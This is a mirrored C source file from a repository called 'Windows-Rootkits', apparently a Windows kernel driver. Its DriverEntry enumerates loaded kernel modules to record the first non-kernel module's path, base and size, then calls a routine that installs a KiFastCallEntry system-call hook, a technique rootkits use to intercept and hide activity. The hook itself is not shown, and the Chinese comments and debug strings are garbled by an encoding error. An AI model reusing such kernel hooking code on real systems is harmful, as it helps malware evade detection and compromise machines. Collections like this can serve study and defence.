mirror of
https://github.com/ciyze0101/Windows-Rootkits
synced 2024-07-01 03:00:54 +00:00
76 lines
1.9 KiB
C
76 lines
1.9 KiB
C
|
|
|||
|
|
#ifndef CXX_MONITOR_H
|
|||
|
|
# include "Monitor.h"
|
|||
|
|
#include "HookKiFastCallEntry.h"
|
|||
|
|
#endif
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
extern BOOLEAN IsClear;//<2F><>Դ<EFBFBD>Ƿ<EFBFBD><C7B7><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
|
|
|||
|
|
extern PKSERVICE_TABLE_DESCRIPTOR KeServiceDescriptorTable;
|
|||
|
|
WCHAR FirstModulePath[260] = {0};
|
|||
|
|
ULONG_PTR FirstModuleBase = 0;
|
|||
|
|
ULONG_PTR FirstModuleSize = 0;
|
|||
|
|
NTSTATUS
|
|||
|
|
DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING pRegistryString)
|
|||
|
|
{
|
|||
|
|
NTSTATUS status = STATUS_SUCCESS;
|
|||
|
|
|
|||
|
|
|
|||
|
|
// Unload routine
|
|||
|
|
DriverObject->DriverUnload = DriverUnload;
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
InitGlobalVariable();
|
|||
|
|
|
|||
|
|
GetFirstModuleInformation(DriverObject);
|
|||
|
|
|
|||
|
|
_KisInstallKiFastCallEntryHook();
|
|||
|
|
|
|||
|
|
return STATUS_SUCCESS;
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
|
|||
|
|
VOID GetFirstModuleInformation(PDRIVER_OBJECT DriverObject)
|
|||
|
|
{
|
|||
|
|
ULONG Base=0;//ģ<><C4A3><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ַ
|
|||
|
|
LDR_DATA_TABLE_ENTRY* SectionBase=NULL;
|
|||
|
|
LIST_ENTRY* Entry=NULL;
|
|||
|
|
LIST_ENTRY InLoadOrderLinks;
|
|||
|
|
Entry=((LIST_ENTRY*)DriverObject->DriverSection)->Flink;
|
|||
|
|
do
|
|||
|
|
{
|
|||
|
|
SectionBase=CONTAINING_RECORD(Entry,LDR_DATA_TABLE_ENTRY,InLoadOrderLinks);//<2F>õ<EFBFBD><C3B5><EFBFBD><EFBFBD><EFBFBD>Entry<72><79><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Section<6F>ĵ<EFBFBD>ַ<EFBFBD><D6B7><EFBFBD>˷<EFBFBD><CBB7><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>֤<EFBFBD><D6A4><EFBFBD><EFBFBD>
|
|||
|
|
if (SectionBase->EntryPoint&&SectionBase->BaseDllName.Buffer&&SectionBase->FullDllName.Buffer&&
|
|||
|
|
SectionBase->LoadCount
|
|||
|
|
)
|
|||
|
|
{
|
|||
|
|
if(wcscmp(SectionBase->BaseDllName.Buffer,L"ntkrnlpa.exe")!=0)
|
|||
|
|
{
|
|||
|
|
wcsncpy(FirstModulePath,SectionBase->FullDllName.Buffer,SectionBase->FullDllName.Length);
|
|||
|
|
FirstModuleBase= SectionBase->DllBase;
|
|||
|
|
FirstModuleSize = SectionBase->SizeOfImage;
|
|||
|
|
DbgPrint("<EFBFBD><EFBFBD>һģ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>:%wZ,<2C><>ַ:%x\r\n",&(SectionBase->FullDllName),SectionBase->DllBase);
|
|||
|
|
break;
|
|||
|
|
}
|
|||
|
|
DbgPrint("<EFBFBD><EFBFBD>һģ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>:%wZ,<2C><>ַ:%x\n",&(SectionBase->FullDllName),SectionBase->DllBase);
|
|||
|
|
|
|||
|
|
|
|||
|
|
}
|
|||
|
|
Entry=Entry->Flink;
|
|||
|
|
}while(Entry!=((LIST_ENTRY*)DriverObject->DriverSection)->Flink);//ֱ<><D6B1><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
|
}
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
VOID
|
|||
|
|
DriverUnload(IN PDRIVER_OBJECT DriverObject)
|
|||
|
|
{
|
|||
|
|
|
|||
|
|
return;
|
|||
|
|
}
|